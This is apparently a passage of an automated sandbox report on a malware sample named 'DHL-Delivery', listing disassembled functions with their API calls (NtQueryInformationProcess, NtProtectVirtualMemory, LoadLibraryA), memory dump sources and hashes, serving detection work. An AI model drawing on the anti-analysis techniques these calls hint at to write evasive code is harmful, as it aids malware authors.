                        • Instruction Fuzzy Hash: 6B413321749216DDFF254914C9A83EA3E92BB66731FE94E5BCC22C72A0D37285C5DA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AF5F, Relevance: 1.6, APIs: 1, Instructions: 135librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 9e3ce712634e743aad8be90c402f7cdb3b1e8ff28c43155397a2e1dbd17358c0
                        • Instruction ID: 48d22c822ae429d2145339d88f0a02ced23c4ba953043fba6e5e301276233781
                        • Opcode Fuzzy Hash: 9e3ce712634e743aad8be90c402f7cdb3b1e8ff28c43155397a2e1dbd17358c0
                        • Instruction Fuzzy Hash: 59415221348216DDFF244924C9A83EA3E92BF26731FE94E5ACC22C72E0D33245C5DA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AFC9, Relevance: 1.6, APIs: 1, Instructions: 127librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: bc15a4859dcf3b53b0e79e43a354bb50522ec2a00817a77670c774f96ca8969f
                        • Instruction ID: 8b5581d6eb62c01fabefd8e1b021344ebacb3a3a13de904582ffdb6b6cc80d61
                        • Opcode Fuzzy Hash: bc15a4859dcf3b53b0e79e43a354bb50522ec2a00817a77670c774f96ca8969f
                        • Instruction Fuzzy Hash: 76314421348206DDFF245914C9A83EA3E92BF67735FE94E5ACC22C32A0D37245C5DA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B085, Relevance: 1.6, APIs: 1, Instructions: 122librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 5a34f773af1ae914b420a92941ebee81ca97084bc3b3d8ccc05c5f456bb9499a
                        • Instruction ID: e4bb43d10d631f612a636085c09e303346f7e1272cc0fcb1bea7f1bc0a8171ef
                        • Opcode Fuzzy Hash: 5a34f773af1ae914b420a92941ebee81ca97084bc3b3d8ccc05c5f456bb9499a
                        • Instruction Fuzzy Hash: BE316B21745306DDFF205964C9A83E53B93BB67735FD54A5ACC12C32A0D37245C9C543
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056AFED, Relevance: 1.6, APIs: 1, Instructions: 122nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: 3976cb3bfec3a977f09aa9cc9a009dd32825d59edac067ef38ad91411e78eeb5
                        • Instruction ID: 6e771098ce0d3b3c64df233f502ff5a6f8ee5a78b0104361d7449be92eec9edb
                        • Opcode Fuzzy Hash: 3976cb3bfec3a977f09aa9cc9a009dd32825d59edac067ef38ad91411e78eeb5
                        • Instruction Fuzzy Hash: 47314621745215DEFF245914C9AC3EA3E92BB67735FE94E5ACC22C32A0D37245C5DA03
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Function 0056B01A, Relevance: 1.6, APIs: 1, Instructions: 119librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 868dbc8421b8b3c03860f46eff1741dfb80af83a535dd7cfcf330849c118b0a5
                        • Instruction ID: 3d017478810559471ea8e12a9d4c12f8d81818d2490b77479dbe966037394be1
                        • Opcode Fuzzy Hash: 868dbc8421b8b3c03860f46eff1741dfb80af83a535dd7cfcf330849c118b0a5
                        • Instruction Fuzzy Hash: C3312421744215DDFF245954C9683E63E93BB6B735FE94E5ACC22C32A0D37245C9DA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B03A, Relevance: 1.6, APIs: 1, Instructions: 117librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 6ceee01707849eb58e8529ef930f95fbcc9bcc8868906e7f62fda12d29b941d6
                        • Instruction ID: 032f1b98c419050922e8386f1301120712c80b97c196c4d5f8a9e485e0271704
                        • Opcode Fuzzy Hash: 6ceee01707849eb58e8529ef930f95fbcc9bcc8868906e7f62fda12d29b941d6
                        • Instruction Fuzzy Hash: 28314421744215DDFF205914C9683EA3E92BB67735FE94A5ACC22C32A0D37245C5DA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B061, Relevance: 1.6, APIs: 1, Instructions: 116librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: b346abf3efd60b4f249fe2a3ea831b7005d25b76b3444509b6406929aa50c69f
                        • Instruction ID: e84da135dccf00e84d979be1a12803171027bda1afd26ed41b3a84217998c1b5
                        • Opcode Fuzzy Hash: b346abf3efd60b4f249fe2a3ea831b7005d25b76b3444509b6406929aa50c69f
                        • Instruction Fuzzy Hash: 86313621345206DDFE245914C9683EA3A93BB67735FE94B5ACC12C32A0D33245C6D943
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B0CB, Relevance: 1.6, APIs: 1, Instructions: 104librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: f8f24338699099bffd58ae33bacecc9a6d09aac0a71c7f929992278c810e4f7e
                        • Instruction ID: d2672aec309d0941b0afde54c463aacdbbd70d2a3beb463dc7c9091c6795615e
                        • Opcode Fuzzy Hash: f8f24338699099bffd58ae33bacecc9a6d09aac0a71c7f929992278c810e4f7e
                        • Instruction Fuzzy Hash: 2A312722745305DDFF245914C9683EA3A97BB67735FE94B5ACC12C72A0D37249C5CA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B0E9, Relevance: 1.6, APIs: 1, Instructions: 101librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: e517bcc6e8858c829a6ee77b15776124f67e0b5890eba64ba86239a4f93b03fe
                        • Instruction ID: d48cf8248737b1e4379e5003fe8c95f62647ad0fc114d3c35a1854fc63b79783
                        • Opcode Fuzzy Hash: e517bcc6e8858c829a6ee77b15776124f67e0b5890eba64ba86239a4f93b03fe
                        • Instruction Fuzzy Hash: F6313622745305DDFF245914C9A83EA3A93BB67735FE94A5ACC11C72A0D33249C9CA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B109, Relevance: 1.6, APIs: 1, Instructions: 101librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 0e2e0b5293f63c85c830d9ff84e0db1e9edfa5b55ad52127dcafcd4014f993bd
                        • Instruction ID: 7c58aa193050f4456c50ccfcbe9f3edcaf1639d6b90e5f216567ed4805a344f0
                        • Opcode Fuzzy Hash: 0e2e0b5293f63c85c830d9ff84e0db1e9edfa5b55ad52127dcafcd4014f993bd
                        • Instruction Fuzzy Hash: 96314622745305CDFF205914C9A83EA3A93BB67735FD94A5ACC11C72A0D33249CACA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B132, Relevance: 1.6, APIs: 1, Instructions: 98librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: b5df7b79c428e4df45fcd7a6ac6527ba2735879d1dd2ca4d28a1d2c916524cde
                        • Instruction ID: 385163eff2883fcf066c48a18c40f45665489b09e29f25e5bf523db4baca5288
                        • Opcode Fuzzy Hash: b5df7b79c428e4df45fcd7a6ac6527ba2735879d1dd2ca4d28a1d2c916524cde
                        • Instruction Fuzzy Hash: F3214621745305CEFF205824C9683E63A92BB67735FD94A5ACC11C72A0D37249C6CA43
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B156, Relevance: 1.6, APIs: 1, Instructions: 95librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: ea18b5e75d3df4e9d17cad0d96e4098601e86c9ca2f6cc5cd8d83bc824ae1ef0
                        • Instruction ID: 68903d109910391716c174e8d3f25654682e921369801b3e19dab0a9efd6ad0c
                        • Opcode Fuzzy Hash: ea18b5e75d3df4e9d17cad0d96e4098601e86c9ca2f6cc5cd8d83bc824ae1ef0
                        • Instruction Fuzzy Hash: 9C212122745305CDFF205868CA683E63A93BB6B735FDA4A5ACC11C72A0D37249C9CA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B177, Relevance: 1.6, APIs: 1, Instructions: 93librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 39a307dc4ad91bfe0dab869af16c6f9d1a70577f0d0d3da3ce0c99a6fb136eb3
                        • Instruction ID: ee48fb336f646dbb07a946afb629f7f7f012563e07b97bc63c08bcec60fb8592
                        • Opcode Fuzzy Hash: 39a307dc4ad91bfe0dab869af16c6f9d1a70577f0d0d3da3ce0c99a6fb136eb3
                        • Instruction Fuzzy Hash: 7A210522741305CDEF245D64CAA83E63A97BB66735FD94A5ACC11C72A0D37249C5CA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B1BA, Relevance: 1.6, APIs: 1, Instructions: 81librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 157d283f84b509a99657153bdb38dd2818d0b26b35f5b7a7a3413a8a2382a1d8
                        • Instruction ID: d90486b0679ea4f3a0cf0c2c82dcf2f4cd5f5a8197236b4d0274b782682b0f9b
                        • Opcode Fuzzy Hash: 157d283f84b509a99657153bdb38dd2818d0b26b35f5b7a7a3413a8a2382a1d8
                        • Instruction Fuzzy Hash: FD213A22741305CDFF255C68C9683EA3B97BB6BB35FD90A9AC911C72A0D37249C5CA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B1FB, Relevance: 1.6, APIs: 1, Instructions: 70librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: d5017595cf1b2e172c11d406ceea302faa367cc4291752643f2ef2aeb9201d6f
                        • Instruction ID: f63f98e0fc8ea30e66572333bd5426f29add94e549fb1e7210d1fbff54e559fd
                        • Opcode Fuzzy Hash: d5017595cf1b2e172c11d406ceea302faa367cc4291752643f2ef2aeb9201d6f
                        • Instruction Fuzzy Hash: F0115C127453118DEE256CA8CDA43DA3B53BB6BB30BE90B5AC911C72A0E32305C2D603
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B232, Relevance: 1.6, APIs: 1, Instructions: 63librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: 857d0e42e5e5997a17d0d621a30d9e3dee561af408f101100285bbf02d366527
                        • Instruction ID: b995744b6cd12016e0114430cfc80fccb7699dc4a0e5a3525c419f6dbe22f2e7
                        • Opcode Fuzzy Hash: 857d0e42e5e5997a17d0d621a30d9e3dee561af408f101100285bbf02d366527
                        • Instruction Fuzzy Hash: FD018E127413128DAF225CA9CDA43DA3A13B75BB30BD90B6EC521C72A0D73345C2CA03
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056B283, Relevance: 1.5, APIs: 1, Instructions: 48librarynativeUNIQUE
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,000069A0), ref: 005684E2
                        • NtQueryInformationProcess.NTDLL ref: 0056B2CA
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadProcessQuery
                        • String ID:
                        • API String ID: 1311672033-0
                        • Opcode ID: d985d9100c14dc0e1902143184b3adc8e4fdfbc6ef2f3888868118f410285d6e
                        • Instruction ID: c11f052ccb3b369b1c4356c61b2c5abe514d2e4863930736d45004dc18c65f75
                        • Opcode Fuzzy Hash: d985d9100c14dc0e1902143184b3adc8e4fdfbc6ef2f3888868118f410285d6e
                        • Instruction Fuzzy Hash: CFF0AC2238131289DE2298B9CE903DE3613EB5EA20BD10B6EC022872E4D33341C3C947
                        Uniqueness

                        Uniqueness Score: 37.75%

                        Function 0056A407, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                        Download Yara Rule
                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00569C94,00000040,00564080,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0056A423
                        Memory Dump Source
                        • Source File: 00000006.00000002.2177407076.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_563000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: 2229240f5f416fd22c3bd5b6d6417b2833a62eb4424814c2ad989dda4904048f
                        • Instruction ID: 4a5feaa05eab9c8a2219e414b785f867e32f1cc28c92e62f58d93c91a6030e8b
                        • Opcode Fuzzy Hash: 2229240f5f416fd22c3bd5b6d6417b2833a62eb4424814c2ad989dda4904048f
                        • Instruction Fuzzy Hash: D1C012E06280002E79048A28CD48C2BB2AAC6D8B38B54C32CB872A26CCC930EC048132
                        Uniqueness

                        Uniqueness Score: 0.03%

                        Function 1E120800, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 9195b823a82c3741262ca3960440d10666c84ce91d0d11b87728f64dceadd8c7
                        • Instruction ID: 2dfb2af695dd51ceb404d0affc7d4caa1241ebd3f247b54a8cf8a9a359dc228a
                        • Opcode Fuzzy Hash: 9195b823a82c3741262ca3960440d10666c84ce91d0d11b87728f64dceadd8c7
                        • Instruction Fuzzy Hash: 6590023A24100417D121615D550475B100D47D0753FE5C512A0425518D965689D6A161
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E120890, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 544ae2f97409213ad708a2914527d6b6aa7fba32a9e566e9164d1baf2cef4ad9
                        • Instruction ID: 6cb5479123fec7e4729285aee921cc5304367bc1a4327e562c1fa63fed5eeefb
                        • Opcode Fuzzy Hash: 544ae2f97409213ad708a2914527d6b6aa7fba32a9e566e9164d1baf2cef4ad9
                        • Instruction Fuzzy Hash: C490022A64100507D111715D540466A100E47D0753FE5C122A1025515ECA2589D6A171
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E1208B0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: d0897efed40096756601f99c24e9a9bf00e0eaa9e6f8c995b22ad6dae2fb64eb
                        • Instruction ID: 60b534805c5d63d551783499b61602151e4527840d73abb480871d3b5023c578
                        • Opcode Fuzzy Hash: d0897efed40096756601f99c24e9a9bf00e0eaa9e6f8c995b22ad6dae2fb64eb
                        • Instruction Fuzzy Hash: 0A90027A24100407D150715D540479A100947D0713FA5C111A5065514E86598DD966A5
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E120940, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5b7ea3be17f9592d24e2af6ad41ff41f41fa97445e7ed5e4bfe243f0d69d1957
                        • Instruction ID: ea38b50316f3656812de18db43d0e5ef02e954be8afd54b5a9bc0079e4028b76
                        • Opcode Fuzzy Hash: 5b7ea3be17f9592d24e2af6ad41ff41f41fa97445e7ed5e4bfe243f0d69d1957
                        • Instruction Fuzzy Hash: F890026A38100447D110615D5414B5A100987E1713FA5C115E1065514D8619CCD66166
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E1209A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 913bd909c50beb5e00ba76f25da08417f8c0d9f52f0bafaae8b4f29045f65d9f
                        • Instruction ID: 64b4fe41af9b2823610c96a66fc7833e031712b64cff40cacdd10a4b20da9e28
                        • Opcode Fuzzy Hash: 913bd909c50beb5e00ba76f25da08417f8c0d9f52f0bafaae8b4f29045f65d9f
                        • Instruction Fuzzy Hash: A790023A24140407D110615D581475F100947D0713FA5C111A1165515D862588D565B1
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E1209C0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c9acb7d0d5ebf471beeb128dfb915544709e34b2fcfb5f04b89265464a9614cd
                        • Instruction ID: a607ecfc10a2cf295b4bdb2c5712f01262344833944fc3a233a3f21cf4674136
                        • Opcode Fuzzy Hash: c9acb7d0d5ebf471beeb128dfb915544709e34b2fcfb5f04b89265464a9614cd
                        • Instruction Fuzzy Hash: 1C90022A641000474150716D984495A50096BE17237A5C221A0999510D855988E956A5
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E1209F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b1a6b0efe364c8f15cfd5f401a48d99037031e0ff9894e20e710cbb225ef7c9c
                        • Instruction ID: bfb27dc48b3b8da8145cb9daaad2b91ffe801eeae746c808435ae165e672e1cf
                        • Opcode Fuzzy Hash: b1a6b0efe364c8f15cfd5f401a48d99037031e0ff9894e20e710cbb225ef7c9c
                        • Instruction Fuzzy Hash: 9990022A25180047D210656D5C14B5B100947D0713FA5C215A0155514CC91588E55561
                        Uniqueness

                        Uniqueness Score: 0.02%

                        Function 1E120600, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: b4fb83cc9a0c32dc79fd8a0e8d6e4b6d3c1ff9854345656a8d08946e242010bf
                        • Instruction ID: 99ebadeb9e9f6bab86fb7807d7aaad4ea3ae47fba6dd45e57c1be2a4cad6fb93
                        • Opcode Fuzzy Hash: b4fb83cc9a0c32dc79fd8a0e8d6e4b6d3c1ff9854345656a8d08946e242010bf
                        • Instruction Fuzzy Hash: 9C90023A24100807D190715D540469E100947D1713FE5C115A0026614DCA158ADD77E1
                        Uniqueness

